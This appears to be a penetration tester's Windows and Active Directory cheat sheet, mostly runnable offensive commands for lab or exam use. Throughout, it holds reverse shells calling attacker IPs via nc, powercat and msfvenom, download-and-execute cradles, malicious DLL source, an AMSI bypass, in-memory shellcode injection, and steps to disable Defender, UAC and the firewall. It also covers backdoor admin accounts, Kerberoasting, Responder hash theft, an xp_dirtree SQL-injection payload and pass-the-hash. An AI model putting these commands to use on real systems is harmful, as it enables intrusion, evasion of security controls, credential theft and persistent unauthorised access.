GUI - Desktop

  • RDP
  • Remina (better for transfering files: use “share folder”)
xfreerdp /u:administrator /p:P@$$W0rd /cert:ignore /v:10.10.161.175
xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
xfreerdp /u:bob /cert:ignore /v:10.10.189.227
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:$IP /u:administrator /p:'4q6X[redacted]dxs'
xfreerdp /v:IP /d:DOMAIN /u:USER /p:PASS /cert:ignore /auto-reconnect-max-retries:0 +auto-reconnect +clipboard /dynamic-resolution /drive:/usr/share/windows-binaries/,share

Windows Kernel Exploits

https://juggernaut-sec.com/kernel-exploits-part-1/ https://juggernaut-sec.com/kernel-exploits-part-2/

precompiled kernel exploit binaries. https://github.com/SecWiki/windows-kernel-exploits

Hunting for Kernel Vulnerabilities

Gather information about the hotfixes installed on a host

wmic qfe get Caption,Description,HotFixID,InstalledOn

The date of the hotfix includes the year the vulnerability was identified / patched.
For example: MS10-059 (2010), MS17-010 (2017), etc.

Enumerating Kernel Exploits – Tools

Old windows (< Windows 10)

Windows Exploit Suggester 2 https://github.com/7Ragnarok7/Windows-Exploit-Suggester-2

./windows-exploit-suggester.py --database 2021-04-16-mssb.xls --systeminfo win7.txt | grep "\[M\]\|\[E\]" | grep "Elevation"

Sherlock https://github.com/rasta-mouse/Sherlock

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

Let’s modify the script with the following

echo "Find-AllVulns" >> Sherlock.ps1

powershell.exe -nop -exec bypass -c "iex(new-object net.webclient).downloadstring('http://172.16.1.30/Sherlock.ps1')"

We can also use /opt/wesng/wes.py

New windows (> Windows 10)

Watson.exe, Windows OS’ (10 / 2016 / 2019) https://github.com/Juggernaut-Sec/Windows-Privilege-Escalation/blob/main/Watson.exe

Docs / Tools

Priv escalation https://pentestwiki.org/privilege-escalation-in-windows-and-linux/ Exploit 2016 https://xorond.com/posts/2021/04/windows-local-privilege-escalation/

Reverse shell https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Manage Users: https://www.windows-commandline.com/cmd-net-user-command/

https://www.daronwolff.com/windows-enumeration-post-explotation/ https://securitytutorials.co.uk/basic-enumeration-on-a-windows-pc/ https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc Command Line fu https://www.windows-commandline.com/?s=domain+controller

https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview

Active Directory

MindMap https://tajdini.net/blog/penetration/active-directory-penetration-mind-map/ MadMind https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg List of helpful command https://hackerifg.com/active-directory/ https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#dcsync-attack https://0x4rt3mis.github.io/posts/Active-Directory-Commands/ https://www.hackingdream.net/2021/04/active-directory-penetration-testing-cheatsheet.html GPO https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/gpo-abuse

CVE

https://github.com/Al1ex/WindowsElevation https://kakyouim.hatenablog.com/entry/2020/05/27/010807 List of common binaries https://github.com/SecWiki/windows-kernel-exploits https://github.com/Al1ex/WindowsElevation https://kakyouim.hatenablog.com/entry/2020/05/27/010807

Download binaries https://live.sysinternals.com/ Static binaries: https://github.com/andrew-d/static-binaries https://github.com/Hacker-One/WindowsExploits

lolbas https://lolbas-project.github.io/

Process Explorer (for old windows) https://eternallybored.org/misc/procexp/

.\winPEASany.exe | tee -filepath C:\Windows\Temp\winpeas.txt

winpeas.exe > outputfile.txt

winPEAS and PowerUp.ps1

powershell.exe -nop -exec bypass
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File

https://infosecwriteups.com/automating-ad-enumeration-with-frameworks-f8c7449563be https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet https://payatu.com/blog/manmeet/ad-enumeration-without-external-scripts https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

Priv Esc

https://github.com/GhostPack/Seatbelt https://github.com/GhostPack/SharpUp https://github.com/gladiatx0r/Powerless

https://github.com/bitsadmin/wesng https://github.com/carlospolop/winPE/tree/master/binaries/watson

https://www.hackingarticles.in/window-privilege-escalation-automated-script/

Windows Exploit Suggester

python2 /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
python2 /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py -i systeminfo.txt -d 2021-11-02-mssb.xls

Search / Find

Search/find a exe file

Get-ChildItem -Path C:\ -Include "*.exe" -File -Recurse -ErrorAction SilentlyContinue

Search/find for a file

dir "\flag.txt*" /s

Search/Find a txt file

findstr /si password*.txt

File

icacls job.bat
certutil -urlcache -f http://10.10.16.42/nc.exe c:\windows\temp\nc.exe
echo C:\Windows\Temp\nc.exe -e cmd.exe 10.10.16.42 1234 > C:\Log-Management\job.bat

Config interfaces

Open config console

msconfig

Open computer management

compmgmt

Open users manager

lusrmgr.msc

Open perf manager

perfmon

Open resource monitor

resmon

Open updates viewer

control /name Microsoft.WindowsUpdate

Important Commands

Recursive file listing

dir /a /b /s 

gci -recurse . | select FullName

File size

gci file.txt | select Length

Check file encryption

cipher /c file.txt

List users

net users

List info for user

net user xxx

List shares

net share

Extract all accounts in the Service Principal Name

setspn -T medin -Q */*

Get an overview of the system

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get processor \ os architecture

echo %PROCESSOR_ARCHITECTURE%

Machine name

echo  %computername% 

hostname

Add user john to local admin

net localgroup administrators john /add

net localgroup Administrators

whoami /priv

Add user to domain group

net group "Domain Admins" testuser /ADD /DOMAIN

List domain group

net group "Domain Admins"

Check the registry for User Autologon / Winlogon credentials

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

other users logged in

qwinsta

Query info for a service

sc query windefend
sc queryex type=service

patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

List software

wmic product get name,version,vendor

Check firewall status

netsh firewall show stat

Add user local

Net user /add tom Password1

Add host DNS

echo 10.10.21.171 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts

Add user

net user dummy dummy2020 /ADD
net user dummy dummy2020 /ADD /DOMAIN


net localgroup administrators dummy /add

Session

/opt/impacket/examples/psexec.py [email protected] -hashes :NTLMHASH

Powershell

powershell -ep bypass

Get-Content -Path 'C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'

Password

Find cleartext passwords

cmdkey /list

Try credentials as

runas /savecred /user:admin reverse_shell.exe

runas /env /noprofile /savecred /user:administrator "cmd.exe /c whoami > whoami.txt"

runas /env /profile /user:DVR4\Administrator "C:\Users\viewer\nc.exe -e cmd.exe 192.168.49.62 443"

runas using powershell

# Set the 
$secpasswd = ConvertTo-SecureString "myPass123" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("offsec", $secpasswd)

# Then we can use the password
Start-Process -FilePath powershell.exe -argumentlist "C:\temp\nc.exe 10.11.1.43 -e cmd.exe" -Credential $mycreds

powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password);Start-Process -FilePath "shell.exe" -Credential $creds"

echo "copy C:\Users\maria\file C:\programdata\file" > cmd.ps1
Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}

psexec.exe /accepteula -c nc.exe -e cmd.exe 192.168.49.91 445

Check registry keys for passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

DLL Hijacking

Malicious DLL

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("net user tom Password1");
        system("cmd.exe /k whoami > C:\\Temp\\clobee_was_here.txt");
        ExitProcess(0);
    }
    return TRUE;
}

install

apt install gcc-mingw-w64-x86-64

The mingw compiler can be used to generate the DLL file with the command given below:

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

Upload malicious on the victim

wget -O hijackme.dll ATTACKBOX_IP:PORT/hijackme.dll

We will have to stop and start the dllsvc service again using the command below:

sc stop dllsvc & sc start dllsvc

Unquoted Service Path Vulnerabilities

  • Can you write to a folder on the path?
  • Are you able to restart the service

Note: The WMIC tool is deprecated in Windows 10, version 21H1. Windows PowerShell supersedes this tool for WMI.

List services running on the target system

wmic service get name,displayname,pathname,startmode

List non standard services / abnormal

wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows"

List non standard services / abnormal services with auto start mode

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

List unquoted services

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Check privileges

.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"

Check binary path of a service

sc qc unquotedsvc

Generate a reverse shell exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.49.211 LPORT=LOCAL_PORT -f exe > reverse_shell.exe

Restart the service

sc start unquotedsvc

Scheduled Tasks

Query scheduled tasks.

schtasks /query /fo LIST /v
schtasks /query /tn vulntask /fo list /v

Review permissions

icacls c:\tasks\schtask.bat

Query registry (both should be set)

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Generate a malicious .msi

msfvenom -p windows/x64/shell_reverse_tcpLHOST=ATTACKING_10.10.49.211 LPORT=LOCAL_PORT -f msi -o malicious.msi

Open listener on attack box Transfer files to victim

Run malicious code

C:\>msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Active Directory

Find out if a user is able to access winrm

crackmapexec winrm -u tess -p Password123 --continue-on-success 172.16.2.3
evil-winrm -i 172.16.2.3 -u tess -p Password123 -s '/usr/share/windows-resources/powersploit/Recon/'

Find group policy

findstr /S /I cpassword \\blabla.local\sysvol\blabla.local\policies\*.xml

Domain meta-data enum

ldapsearch -LLL -x -H ldap://dc01.lab.ropnop.com -b '' -s base '(objectclass=*)'

Bloodhound

Clear Neo4j database

rm -rf data/graph.db

BloodHound Installation

apt-get install bloodhound

start

neo4j console

with default credentials -> neo4j:neo4j (or abc)

Getting loot w/ SharpHound

powershell -ep bypass #same as with PowerView
.\SharpHound.ps1 
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Copy the loot.zip in Kali and import it in bloodhound for analysis!

run

bloodhound

run via python

bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1

Kerberos

https://github.com/ropnop/kerbrute/releases https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Enumerating Users w/ Kerbrute in the Domain Controller

kerbrute userenum --dc 172.31.3.9 -d domainName.csl /opt/Seclists/Usernames/xato-net-10-million-usernames.txt

Then confirm the users with bruteforce

crackmapexec smb 172.31.3.9 -u users.txt -p users.txt --continue-on-success

Then user WinRM https://github.com/Hackplayers/evil-winrm

evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]

Other tools to consider

SharpGPOAbuse

Harverst TGT every 30secs

Rubeus.exe harvest /interval:30

Take a given password and “spray” it against all found users then give the .kirbi TGT for that user

Rubeus.exe brute /password:Password1 /noticket

Kerberoast

Extract all accounts in the SPN (Service Principal Name)

setspn -T medin -Q*/*

Get Powershell Invoke-Kerberoast script.

iex​(New-Object Net.WebClient).DownloadString('http://10.11.21.99/Invoke-Kerberoast.ps1')
powershell -c wget "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1" -outfile "C:\Windows\System32\spool\drivers\color\Invoke-Kerberoast.ps1"

Get kerberoast from kali

locate Kerberoast
/usr/share/powershell-empire/data/module_source/credentials/Invoke-Kerberoast.ps1

Now lets load this into memory:

Invoke-Kerberoast -OutputFormat hashcat ​| fl

You should get a SPN ticket and you can crack it

hashcat -m 13100 -​a 0 hash.txt wordlist --force

Privilege escalation (with powerup)

iex​(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1')

Kerberoasting w/ Rubeus

1.) cd Downloads - navigate to the directory Rubeus is in

2.) Rubeus.exe kerberoast This will dump the Kerberos hash of any kerberoastable users

copy the hash onto your attacker machine and put it into a .txt file so we can crack it with hashcat

I have created a modified rockyou wordlist in order to speed up the process download it here

3.) hashcat -m 13100 -a 0 hash.txt Pass.txt - now crack that hash

Method 2 - Impacket

Impacket Installation -

Impacket releases have been unstable since 0.9.20 I suggest getting an installation of Impacket < 0.9.20

1.) cd /opt navigate to your preferred directory to save tools in

2.) download the precompiled package from https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19

3.) cd Impacket-0.9.19 navigate to the impacket directory

4.) pip install . - this will install all needed dependencies

Kerberoasting w/ Impacket -

1.) cd /usr/share/doc/python3-impacket/examples/ - navigate to where GetUserSPNs.py is located

2.) sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.147.217 -request - this will dump the Kerberos hash for all kerberoastable accounts it can find on the target domain just like Rubeus does; however, this does not have to be on the targets machine and can be done remotely.

3.) hashcat -m 13100 -a 0 hash.txt Pass.txt - now crack that hash

NTLM theft

  • Start responder
  • then generate ntlm_theft files
  • When user view the files in the share the ntlm hash will be stolen by responder

Method 2:

  • Start responder
  • LFI in victim window call : \KALI_IP\@fake

Method 3 (MSSQL sqli):

  • Start Responder
  • Visit 
    domain.com?id='; exec master..xp_dirtree '\\KALI_IP\@fake.png',11;--

PS: Mysql also vunerable

Method 4:

Snmpwalk

Scanning for SNMP

sudo nmap -sU --open -p 161 10.11.1.1-254 -oG open-snmp.txt
onesixtyone -c community -i ips.txt

Enumerating the Entire MIB Tree

snmpwalk -c public -v1 -t 10 10.11.1.14

Enumerating Windows Users

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25

Enumerating Running Windows Processes

snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2

Enumerating Open TCP Ports

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3

Enumerating Installed Software

snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2

Potato Tokens (any)

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

Local Network Attacks: LLMNR and NBT-NS Poisoning

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning/

respond to LLMNR request and capture user credentials

python Responder.py -I eth0 -wfv

The Responder program stores the credentials in a file in the local directory called SMB-NTLMv2-Client-192.168.1.74.txt

Which should be then feeded to john or hashcat

Password Enumeration

Search the word “password” in text files

findstr /si password *.txt *.ini *.config

Searching passwords in the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K 
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Passwords in unattend files

C:\unattend.xml 
C:\Windows\Panther\Unattend.xml 
C:\Windows\Panther\Unattend\Unattend.xml 
C:\Windows\system32\sysprep.inf 
C:\Windows\system32\sysprep\sysprep.xml

Interesting files

Check history file

%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Users passwords are stored in base64

C:\Windows\Panther\Unattend\Unattended.xml

Evade / Evasion / bypass

Generated an encoded payload

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=192.168.119.203 LPORT=443 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f c

Encoded powershell

powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

AV bypass with open-ssl encryption

openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
#Start HTTP server
sudo python -m SimpleHTTPServer 80 
#Download from the victim
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh

AV bypass with Base64 encoded

base64 -w0 linpeas.sh > lp.enc
#Start HTTP server
sudo python -m SimpleHTTPServer 80
#Download from the victim
curl 10.10.10.10/lp.enc | base64 -d | sh

default AppLocker rules, bypass it by placing executable in the following directory

C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\Tasks
C:\windows\tracing

Bypassing UAC: https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html

Invoke-BypassUAC -Command ‘C:\Users\ted\Desktop\rev_shell.exe’ Invoke-EventVwrBypass.ps1 nor Invoke-BypassUAC.ps1 https://github.com/CsEnox/EventViewer-UACBypass

In order to change the admin user’s password, we must switch to a high integrity level even if we are logged in with an administrative user

powershell.exe Start-Process cmd.exe -Verb runAs

Turn off / Disable UAC

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Turn off / Disable Firewall

netsh advfirewall set allprofiles state off

Show current firewall profile

netsh advfirewall show currentprofile

netsh advfirewall firewall show rule name=all

Disable winDefend Using PowerShell (as an administrator)

Set-MpPreference -DisableRealtimeMonitoring $true

sc config WinDefend start=disabled
sc stop WinDefend

Do we have a supported way to test AMSI is enabled and working?

You may use the following commands to test SEP AMSI and command line scan components:

powershell -command "& {write-output 'Am I evil? Yes I am!!'}"

Will be detected only if registry value AMSIEnabled = 1 or is absent

cmd /C ECHO Am I evil? Yes I am!!

Will be detected only if reg value CommandLineScanEnabled = 1 or is absent

Bypass AMSII

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

In memory injection

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = 
  Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

We can use the following msfvenom to generate our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell

Persistence

Turning off server securities

# Turn off firewall for all networks
netsh advfirewall set allprofiles state off

# Show current firewall profile
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

# Disable UAC
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

# Disable winDefend
# Using PowerShell (as an administrator)
Set-MpPreference -DisableRealtimeMonitoring $true
sc config WinDefend start=disabled
sc stop WinDefend

Enable RDP

# Enable Local Account Token
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

powershell -ep bypass Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value 0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall add rule name="Open Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

netsh advfirewall firewall set rule group="remote desktop" new enable=yes

netsh advfirewall firewall add rule name="tcp-3389" dir=in action=allow protocol=TCP localport=3389

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Add user hacker/dummy

#Add backdoor user hacker / hacker123 as admin
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add

Passing the Hash (pth)

pth-winexe -U offsec%hash:hash //10.11.0.22 cmd

icacls

We can run icacls, passing the full service name as an argument. The command output will enumerate the associated permissions

icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

F : Full access M : Modify access RX : Read and execute access R : Read-only access W : Write-only access

Sysinternal tools

sigcheck utility from Sysinternals, is a program that allow inspection of the application manifest an XML file containing information that lets the operating system know how to handle the program when it is started.

# -a argument to obtain extended information and -m to dump the manifest.
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

We can use Process Monitor8 from the Sysinternals suite to gather more information about this tool as it executes.

procmon.exe

Troubleshoot

‘whoami’ is not recognized as an internal or external command

set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

Troubleshoot powershell

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> copy \\10.10.16.20\kali\winPEAS.bat win.bat
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> .\win.bat
Program 'win.bat' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\win.bat
+ ~~~~~~~~~.
At line:1 char:1
+ .\win.bat
+ ~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> 

C:\Windows\temp> Import-Module .\CVE-2021-1675.ps1
File C:\Windows\temp\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
C:\Windows\temp> Get-ExecutionPolicy
Restricted
C:\Windows\temp> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
C:\Windows\temp> Get-ExecutionPolicy
Unrestricted
C:\Windows\temp> Import-Module .\CVE-2021-1675.ps1
C:\Windows\temp>